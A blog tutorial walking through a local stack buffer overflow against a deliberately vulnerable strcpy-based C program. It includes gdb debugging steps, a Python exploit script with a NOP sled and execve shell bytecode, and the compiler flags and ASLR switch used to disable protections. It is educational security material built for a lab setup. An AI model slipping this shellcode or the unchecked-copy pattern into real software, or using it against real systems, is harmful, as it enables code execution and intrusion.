"Simple" Stack Based Buffer Overflow - tl;dr and walkthrough

"Simple" Stack Based Buffer Overflow

In stack based buffer overflows, all environments are different. While the exploit is the same as many others, the environment is not, so this post is for documenting what can go wrong. For clarity, this guide follows along to a LiveOverflow video where he creates a buffer overflow exploit: https://www.youtube.com/watch?v=HSlhY4Uy8SA


tl;dr for the compiler and environment problems this guide covers:
  1. gcc needs flag -fno-stack-protector when compiling - Some compilers add stack protection to protect against buffer overflows - related error:
       *** stack smashing detected ***: <unknown> terminated
       Program received signal SIGABRT, Aborted.
       0xf7fd5079 in __kernel_vsyscall ()
  2. gcc needs flag -z execstack when compiling - Some compilers mark stack memory as non-executable, so you are unable to run shellcode that is loaded in the stack - related error:
      Program received signal SIGEGV, Segmentation fault.
      0xfffffd29e in ??() 
  3. Disable ASLR on Ubuntu 18.04.1 using echo 0 | sudo tee /proc/sys/kernel/randomize_va_space - Linux 18.04.1 LTS has ASLR enabled by default which randomizes memory address where programs load there stacks, heaps, vars, etc.

Getting Started:

Tools Used:
  1. Ubuntu 18.04.1 LTS VM was used
  2. gdb
  3. gcc
  4. Python 2.7
In a buffer overflow the main goal is to overwrite the return address on the stack frame with a new address that points to shellcode.

If you are new to understanding the stack, registers, or return addresses I suggest this YouTube video to get started: https://www.youtube.com/watch?v=5iQkR69H_1M

Walkthrough of C code:

Here's the C code we will be exploiting:
    #include <stdio.h>
    #include <string.h>
    int func(char buff[]){         char buffer[64];         printf("Address: %p\n", (void*)&buffer);         strcpy(buffer, buff);         printf("Buffer contents copied");     }
    int main(int argc, char **argv){         if (argc < 2){             printf("Not enough args\n");         }else{             func(argv[1]);         }     }
Synopsis: if there is at least 1 parameter passed into the program, the func() function is called to create a buffer and copies the parameter into the buffer. For debugging purposes, it also prints the buffer's memory address.

What makes this program exploitable is the strcpy() function. When this function is called, it writes contents to memory until the contents contain a null terminator \0. It does not check if it has reached the end of the buffer. This leads to overwriting past the buffer and possibly into program space.

The fun begins:

The above code is in file hello.c. To start, I compiled the code in a bash terminal using:
  gcc -m32 -g -o hello hello.c
This compiles the code as a 32-bit binary with debugging symbols in case they're needed. Also, need to give yourself execute permissions to the file:
  chmod 755 hello
To run the program:

Background on "ret" in assembly:

I found understanding 'ret' in assembly helped me better understand what is going on under the hood during the overflow. (Source: https://c9x.me/x86/html/file_module_x86_id_280.html)

Here's a synopsis: There is a memory address stored in the Stack Pointer (esp). The value stored in this memory address is actually another memory address (also called a pointer) and that points to more executable instructions. This value is also called the return address. In assembly, 'ret' takes the value (return address) in esp and loads it into eip (instruction pointer). That's how a function returns execution back to the caller function (in our case func() returns to main())

In the case of a buffer overflow, before 'ret' is executed, if we can overwrite the value in esp, also called the return address, and replace it with a different address, we can use that execute shellcode. In the picture above, our goal would be to overwrite 0xffffd2dc with our own value.

Source: Wikipedia
In the example above, Char c[12] represents the buffer. When adding content to the buffer with a function such as strcpy(), it could write past the buffer and begin overwriting important information on the stack like the return address as seen in the third image.

The payload in python:

The hello program we compiled takes 1 argument to execute. A python script named payload.py is used to generate the input variable.
Make sure to print 4 of each letter. Since each letter is represented by 8 bits, four letters is 32 bits. This is the width of a memory address making it easy to distinguish later what letters are loaded into what memory addresses. When run with python2:
  python2 payload.py

Finding the Return Address in the current stack frame:

To search for the ret address, we're going to use gdb (GNU Debugger). We'll use it to set a breakpoint on the ASM ret instruction we want to target and then see if our alphabet string overwrites the return address. We'll be targeting ret in the func() function. Launch gdb in the Ubuntu terminal:
  gdb ./hello
In gdb, to add the output of the python script as an argument to our program:
  run $(python2 payload.py)

   *** stack smashing detected ***: <unknown> terminated
   Program received signal SIGABRT, Aborted.
   0xf7fd5079 in __kernel_vsyscall ()
So whats this about? Well, the alphabet string managed to overflow the buffer and also trigger the first buffer overflow protection mechanism.

The gcc compiler on Ubuntu 18.04.1 adds in a stack protector mechanism to detect buffer overflows. Here's is a stack exchange post about it: https://security.stackexchange.com/questions/158609/how-is-the-stack-protection-enforced-in-a-binary

To get around this for learning purposes, recompile the program to disable the stack protector:
  gcc -m32 -g -o hello hello.c -fno-stack-protector
Now let's try to verify in gdb again:
  run $(python2 payload.py)

No stack smashing detected this time, so that's good. So now, let's switch gdb to the Intel assembly syntax:

  set disassembly-flavor intel
Disassemble the func() function. In gdb, type:
   disassemble func
In the output, gdb resolved references to strcpy, printf, and puts. We only care about the last line though
  0x565555ce <+81>:         ret 
This is the return instruction we are going to abuse to have it execute our shellcode. Note: your address will likely look different than this one. Let's set a breakpoint on it. In gdb:
  b *0x565555ce
Run the program again using r $(python2 payload.py). Press y if gdb says the process is already being debugged. It should break on 0x565555ce
Now examine the stack. In gdb:
   x/20wx $esp
  1. x is examine
  2. /20w is 20 words (20 bytes)
  3. the second x tells to display in hexadecimal.
  4. $esp means starting at the stack pointer register
And we get this:

With the breakpoint on ret at 0x565555ce <+81> if we inspect the stack pointer (esp), we will see it pointing at the return address. Display the registers in gdb:

 info registers

Look at the esp register. Does it look familiar?
The esp register is pointing at 0xffffd26c. Since the next instruction is ret, that means 0xffffd26c is the piece of memory that stores our return address.

In gdb, type c to move past the breakpoint:
What happened? It looks like it tried to access memory address 0x54545454? But why?

When the ret instruction is processed, the esp register has an address in it. The address in esp points to the return address. The return address is loaded into eip to redirect program flow back to the caller function, in our case main(). When we examined the contents of esp (x/20wx $esp in gdb) we see the value 0x54545454. This value is the overwritten return address. When we continued execution, ret loaded the instruction pointer with 0x54545454 which it thought was the return address. In this case though, it is invalid memory because we overwrote it, hence our error message.
If you pull up a hex to ascii converter, you'll find that 0x54545454 is TTTT in ASCII. This means from our padding string, the letters TTTT overwrote the return address. That means we can replace TTTT in our python script with an address to point it somewhere else in memory. But where? 🤔 We'll get to that in a second.

So back to our python script:
With this knowlodge, our padding will be everything up to TTTT in the alphabet string. Now we can just replace TTTT with an address of our choice to redirect program flow.

Now what return address should we have replace TTTT in our string?
  • Option 1: Point it at the next address (0xffffd270) and immediately append our shellcode so it takes up that space
  • Option 2: Point it at an offset of  0xffffd26c so it will move to a position from where ESP was pointing and use a NOP sled to execute shellcode
Option 2 is the better choice since we don't want to hardcode addresses in our exploit, we just want to store offsets of other memory addresses. Somethine as simple as different evironment variables on other machines can cause the address space not to line up properly.

Even though we are still technically hardcoding the 0xffffd26c address, we can make use of a technique called a NOP sled to help get to the shellcode. This way even if our return address is off a couple of addresses or even a couple hundred, the NOP sled will is able to help correct for this.

To read up on NOP sleds here's a stack overflow post: https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work/14760699#14760699

So in this case, we'll point our return address to 0xffffd26c+50. This means return to the address 50 bytes above 0xffffd26c. We can always tweak the offset per machine to 100 or 1000 if our exploit fails randomly.

Back to python here's what our exploit script will look like:
import struct
return_address = struct.pack("I", 0xffffd26c+50)
nops = "\x90"*90000
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
print padding+return_address+nops+payload

Line by line explanation:

In the padding string, we won't need from TTTT onward. Having [A-S] in the string is enough to reach the return address. The 4 bytes after SSSS will be our return address.
Now we import the struct module, and use it to format our return address + offset of 50.
  import struct
  return_address = struct.pack("I", 0xffffd26c+50)
For NOPs, we're just going to make a ton of them. The hex code for a NOPs is x90. The idea being, the more NOPs you have (not toooo many), the more likely our return address above will be filled with them.
   nops = "\x90"*90000
The shellcode we're going to use is from here: http://shell-storm.org/shellcode/files/shellcode-827.php
   payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
Shellcode here is a hex representation of x86 assembly code. In this case, this shellcode performs the instructions to launch a /bin/dash process, so when our code executes we'll have a new shell open in our terminal. Then we print it all out to send the output into our hello program
   print padding+return_address+nops+payload

Running the Exploit:

Now when we run this script it will replace the return address with 0xffffd26c+50 (so like 0xffffd28c). Then hopefully at location 0xffffd28c, it will have our NOPs in place to then slide down into our shellcode.

Go back into gdb:
  gdb ./hello
Place a breakpoint at our 'ret' again like last time:
  b *0x565555ce
Run ./hello with the payload:
  r $(python2 payload.py)
Now, we should have hit the breakpoint, let's view the memory again:
  x/30wx $esp
Look at all of those x90s! Those are our NOPs filling memory. If we managed to get our return address pointed to one we're golden. If we look at the memory again where the stack pointer is located, we see that the address loaded in esp changed.
You can see our return address 0xffffd26e+50, which equated to address 0xffffd28e.
Since we filled the code with 90000 NOPs, it's possible this will still work. This is why it is very important for us to use a big NOP sled if we can and an offset from an address that we can change easily without having to know the exact address we're jumping to. Keep in mind, in the real world NOP sleds are easily detectable.

This should still work in this case so let's continue off our breakpoint. Press c to continue in gdb:
  (gdb) c

  Program received signal SIGEGV, Segmentation fault.
  0xfffffd29e in ??() 
My first thought when encountering this was that my NOPs weren't being hit because maybe my offset is incorrect now because the stack changed locations.

But a quick examine x/40wx $esp will prove this wrong:
*NOTE: In between my last three screenshots I changed the offset in my python script slightly, so instead of address equaling 0xffffd28e, it now equals 0xffffd29e. This doesn't affect the outcome of anything though. Just trying to clear up possible confusion.

As we can see here, the return address+offset that we selected should work and it should perform no-operations until it hits the shellcode.

After digging, here's the reason for the segmentation fault: https://security.stackexchange.com/questions/72653/exploiting-buffer-overflow-leads-to-segfault

Basically, when the program was compiled, the compiler marked stack memory as non-executable memory, so if it tries to execute CPU instructions from inside the stack, it faults. This is to help prevent stack based buffer overflows.

To turn this feature off, add the -z execstack arguments in gcc then recompile the program again:
   gcc -m32 -g -o hello hello.c -fno-stack-protector -z execstack
We shouldn't have to reload gdb after compiling. Back in gdb:
   r $(python2 payload.py)
Hit c to continue past the breakpoint aaaaaand~
What is this error?
   process 22411 is executing new program: /bin/bash
   Cannot insert breakpoint 1.
   Cannot access memory at address 0x565555ce
This is just an error in gdb itself. In fact, the shellcode and exploit worked. When the shellcode launched /bin/dash, gdb saw ./hello start a new program and gdb attached to it. Then our breakpoint was unavailable because that memory address didn't exist in the new program, so it exited.
Simple fix. Exit gdb with quit and relaunch. This time, no breakpoint.
   r $(python2 payload.py)
Here's proof of code execution. The shellcode was hit and it launched /bin/dash in our gdb instance. This can be verified with whoami

Running the exploit outside of gdb

That's great and all, but the real test is running it outside of gdb, you know, on a live system like Ubuntu 18.04.1 LTS.

Open a new terminal:
   ./hello $(python2 payload.py)
What?? It just worked in gdb!
   Segmentation fault (core dumped)
I spent a lot of time looking into this. Checking the kernel logs helped a little bit:
   tail -n 4 /var/log/kern.log
According to the logs, the ip is using our return address as expected. But the stack pointer is all over the place. It's not consistent like it was in gdb. Hmmmm....

If we continue to run our program, look at the buffer address it's printing. It changes every time the program is run.

The buffer wasn't changing that often in gdb though? Since it's changing so much, the offset in the exploit can't be used at all. In fact, it's ramdonized so much, there's no way to know what to select as an offset. The question is though, why is the stack pointer and the buffer addresses so random now?
After seeing both of these random quirks, I realized what was going on. The issue is caused by ASLR - Address Space Layout Randomization
This is an operating system level feature that randomizes the layout of memory in programs. Apparently it doesn't affect gdb. The last thing needed for the environment is to turn off ASLR using this:
   echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
Now let's try again:
And it works

This blog post was just to serve as a reminder of the modern protections computers have now days to protect against buffer overflows and how to setup an environment if you plan on giving this a try yourself.

Thanks for reading

4/5/2022 Update: I see what people are querying when coming across this blog post, so I added the related errors to the TL;DR section to hopefully make it easier to digest and updated some grammar.